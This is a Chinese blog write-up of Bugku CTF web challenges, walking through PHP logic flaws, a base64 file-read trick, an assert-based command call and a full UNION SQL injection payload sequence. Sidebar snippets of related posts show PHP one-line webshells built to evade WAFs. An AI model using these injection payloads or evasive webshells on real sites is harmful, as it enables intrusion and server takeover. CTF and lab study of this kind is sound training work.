bugku web专题

最新推荐文章于 2023-01-29 18:47:54 发布
最新推荐文章于 2023-01-29 18:47:54 发布
阅读量375 收藏 1
点赞数 1
分类专栏: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huzi99/article/details/86756295
版权
  1. 计算器

http://123.206.87.240:8002/yanzhengma/

发现只可以输入一位数字,于是查看源码

可以看见maxlength为1

所以只能输入一位数,修改一下。

Flag得到

2.

http://123.206.87.240:8002/post/

当what post传值等于flag时输出flag,使用火狐浏览器的hackbar

  1. 矛盾

http://123.206.87.240:8002/get/index1.php

is_numeric() 函数

如果指定的变量是数字和数字字符串则返回 TRUE,否则返回 FALSE。

矛盾的是又说了如果num是1输出flag,php输入1xxxxx默认第一个1数字

  1. web3

http://123.206.87.240:8002/web3/

查看源码

Unicode编码可疑,在线转码得到

4变量1

http://123.206.87.240:8004/index1.php

var_dump()函数 显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。

有个博客讲的特别清晰https://blog.csdn.net/xuchen16/article/details/82737194

可变变量$$args。如何赋值  $args=GLOBALS  $$args = $GLOBALS,就是输出所有的全局变量

得到array(7) { ["GLOBALS"]=> *RECURSION* ["_POST"]=> array(0) { } ["_GET"]=> array(1) { ["args"]=> string(7) "GLOBALS" } ["_COOKIE"]=> array(0) { } ["_FILES"]=> array(0) { } ["ZFkwe3"]=> string(38) "flag{92853051ab894a64f7865cf3c2128b34}" ["args"]=> string(7) "GLOBALS" }

flag{92853051ab894a64f7865cf3c2128b34}

5web4

http://123.206.87.240:8002/web4/

看到这个unescape

了解了unescape解密

按照代码拼接要求,输入eval返回值得

6.cookies欺骗

http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ=

看这个urla2V5cy50eHQ=显然的base64加密解密可得为keys.txt

按他这个意思就是base64加密访问。Line为行数

Index,php base64加密为aW5kZXgucGhw

写脚本得出全部的index.php代码

这里cookies中的margin是margin

才可以得到keys.php

Keys.php base64编码得到a2V5cy5waHA=

用Firefox浏览器hackbar插件

Emmm得到一片空白,查看源码可以看到flag

7.正则字符

http://123.206.87.240:8002/web10/

源码意思是匹配成功李才可以看到flag

/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i

//双斜杠代表我要匹配的

。*匹配一个数字任意次。数字 {4,7} 前一个字符重复4到7次 \/.\/意思是/一个数字/ [a-z] a-z任意一个字母   [[:punct:]] 任意一个符号 I 意思是字体

那我构造

Key222key22222key:/2/222keya.

8.过狗一句话

http://123.206.87.240:8010/

Assert自由

传值s=print_r(scandir('./')) 或者 s=print_r(glob("*.*"))

(推荐一个博客https://blog.csdn.net/xuchen16/article/details/82798464

看到这个这些个玩意试试打开就好了

  1. 这是一个神奇的登陆框

 

http://123.206.87.240:9001/sql/

此时他显示 try again

测试admin_name=qqq'&admin_passwd=111&submit=GO+GO+GO

依旧,说明‘被过滤啦

测试admin_name=qqq"&admin_passwd=111&submit=GO+GO+GO

显然“可以

测试admin_name=qqq" %23&admin_passwd=111&submit=GO+GO+GO没有报错,需要注释一些多余的东西

admin_name=qqq" union select 1,1%23&admin_passwd=111&submit=GO+GO+GO

发现回显位置在login_name

爆数据库名

database(),1%23&admin_passwd=111&submit=GO+GO+GO

爆表名

admin_name=qqq"union select (select table_name from information_schema.tables where table_schema=database() limit 0,1),1%23&admin_passwd=111&submit=GO+GO+GO

爆字段

admin_name=qqq"union select (select column_name from information_schema.columns where table_name='flag1'),1%23&admin_passwd=111&submit=GO+GO+GO

Flag

admin_name=qqq"union select (select flag1 from flag1),1%23&admin_passwd=111&submit=GO+GO+GO

ed6b28e684817d9efcaf802979e57aea

10.web 8

https://ctf.bugku.com/challenges#web8

没问题

大体上ac存在,f是从fn文件中的得到的 ,ac的值要和f相等

所以传值ac为11111,

https://www.cnblogs.com/jianmingyuan/p/5902934.html

写脚本

得到flag

 

Aaron_Kitty
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku web题总结
h0ryit的博客
06-12 1645
陆陆续续将bugkuweb题刷了一大半,剩下的都是分比较高的难点的题,做题过程中遇到了很多的问题,大部分题就没离开过write up,不过还是学到了很多,因此想做一个总结。 线索收集 拿到一个ctf题的第一步就是收集信息,特别是一些隐藏的提示信息,否则会寸步难行。 常见的信息点 网页文档的DOM信息 网页注释 有些题会在网页注释中给出提示信息,比如给出一部分源码之类的...
bugku题库 web
weixin_40658927的博客
04-08 327
域名解析本题要求我们把 flag.bugku.com 解析到120.24.86.145当我们打开flag.bugku.com时,我们会发现网页无法解析地址,所以我们需要手动解析我们可以在windows环境下打开host,然后添加:120.24.86.145     flag.bugku.com或者在Linux环境下:sudo gedit /etc/hosts      然后在输入:120.24.8...
斗狗记之PHP一句话bypass
KEY0NE的个人博客
12-22 203
分享两个过狗的PHP一句话吧,并且讲一讲我的过狗思路<?php#木马免杀:从打狗到被狗咬 error_reporting(0); echo"404NotFound."; $building="ps_ot*^7#[emailprotected]@666666666666666666666666666...
【免杀】————1、PHP一句话过狗、卫士、D盾等免杀思路
Fly_鹏程万里
03-04 1694
00x1.关键字拆分 比如assert,可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。 总结:这种方法虽然简单,但是却没有太强的免杀功效,需要结合其他方法。 00x2.可变变量、引用、可变函数。 可变变量:比如$a=$_POST[‘x’];$b=’a’;@eval($$b); 测试结果: 总结:这种方法对狗等WAF可以绕过哦~但是对于D盾这种多规则的是无效的!引用:比...
过狗一句话原理与利用
金色%夕阳的博客
05-03 1827
过狗一句话原理与利用 在之前的文件上传漏洞中就有介绍过木马文件,通过上传木马文件实现远程连接从而进行远程控制操作。利用上传文件漏洞上传木马文件过程中,可能会遇到服务端对上传文件后缀、文件名、文件格式以及文件内容等进行检测过滤,从而导致木马文件上传失败。如今存在很多过滤机制与安全产品能够实现网站上传保护,比如安全狗。因此,学习如何绕过这些保护机制成功上传木马文件是至关重要的。在下面的学习中我们称之为过狗一句话,该名称源于绕过安全狗的检测机制成功过上传一句话木马文件。 在学习过狗一句话之前,需要先学习一句话木马
过狗的一句话
qq_41814777的博客
10-20 979
php过狗一句话: waf通常以关键字来判断是否是一句话木马。 <?php $test="e#v#a#l"; $test1=explode("#",$test); $test2=$test1[0].$test1[1].$test1[2].$test1[3]; $test2($_POST['zt']); ?> 这是eval函数的一句话的写法 <?...
php 过狗一句话木马的编写
热门推荐
大方子
09-02 1万+
  我们都知道 这个是php一句话  &lt;?php assert($_POST['mima']); ?&gt;可是服务器的安全狗会识别到,我们要经过一些处理, 让安全狗不能认出我们的代码是一句话木马。 好多小白只会用一句话,但是不知道原理,我先大概说一下一句话木马的原理 assert是一个php的函数 assert(这里写代码)  这个函数会执行括号里的代码,(eval 的一句话木...
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugku题的web类解析
01-29
这个是我自习写的bugkuweb的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
web留言板
06-06
Web留言板 (0分) 设计一个简单的基于Web的留言板,要求如下:1)系统中所有页面,如果用户没登录,则让用户返回到登录页面login.jsp(说明:login.jsp页面填写用户的用户名和密码);2)留言板(message.jsp)页面中...
免杀PHP大马过狗
06-13
免杀PHP大马过狗欢迎大家来测试密码123123本程序不得用于商业用途,仅做学习交流
php免杀大马一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个免杀的PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
bugku web题INSERT INTO注入.docx
05-16
bugku web题INSERT INTO注入 明确注入点,是走的http报头的x-forwarded-for。  我尝试了bool型注入,发现自己构造的语句在自己数据库中会报错,但是这里并没有错误报告,因此考虑基于时间的盲注
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
00截断上传绕过_绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)...
weixin_39663970的博客
12-20 240
思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。废话不多说,切入正题。。。。1、实验环境:Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.120482、用于文件上传的PHP源码:...
过安全狗/D盾/360的PHP一句话木马与防范方法
主题模板站的博客
01-29 827
D盾,他不认识二维数组,所以就很轻松绕过了。对了 还有360哦~ 测试了下安全狗,也查不出来,,。防御方法:就是网站下载下来这些php文件,然后通过字符串查找,类似上面的字符。本文阐述了过安全狗/D盾/360的PHP一句话木马,欢迎大家多多指点。过D盾很容易,当然下面还提供一个0等级就的。这样改,立马就变成1个等级的了。过D盾PHP一句话木马。
一句话木马过狗 php,PHP一句话木马过安全狗等杀软
weixin_30774813的博客
03-09 312
第一种:1.php=($_=@$_GET[2]).@$_($_GET[1])?>用中国菜刀连接:http://www.cn-caidao.com/1.php?2=assert密码是1第二种:2.php$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>=${'_'.$_}['_'](${'_'....
$$a,PHP独有的可变变量
weixin_30814329的博客
03-24 249
所谓可变变量,就是一个变量的变量名可以动态的设置和使用。语法形式是PHP的特殊语法,其他语言中少见 有时候使用可变变量名是很方便的。就是说,一个变量的变量名可以动态的设置和使用。一个普通的变量通过声明来设置,例如: <?php $a = 'hello'; ?> 一个可变变量获取了一个普通变量的值作为这个可变变量的变量名。在上面的例子中 hello 使用了两个美元符号(...
一句话木马过狗 php,php过狗一句话
weixin_34812649的博客
03-09 511
1、原一句话:简单利用方法:?a=assert&b=${fputs(fopen('d.php','w'),'')};复杂利用方法:?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};URL解码...
bugku sodirty
最新发布
09-03
Bugku sodirty是一个题目,具体的解题过程可以在记录解题过程的介绍中找到。[1] 该题目可能涉及到PHP代码审计、MD5碰撞、比较绕过等内容。而在解题过程中,可能还会用到一些其他的题目和技术,如pwn3、pwn5、短标签绕过echo、eval代码注入漏洞、$$绕过特定字符限制等。 关于具体解题的详细步骤和方法,可以参考解题过程中的记录。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Bugku解题 web 【四】](https://blog.csdn.net/weixin_46703850/article/details/115184847)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [bugku pwn libc](https://download.csdn.net/download/kety_gz/11656088)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值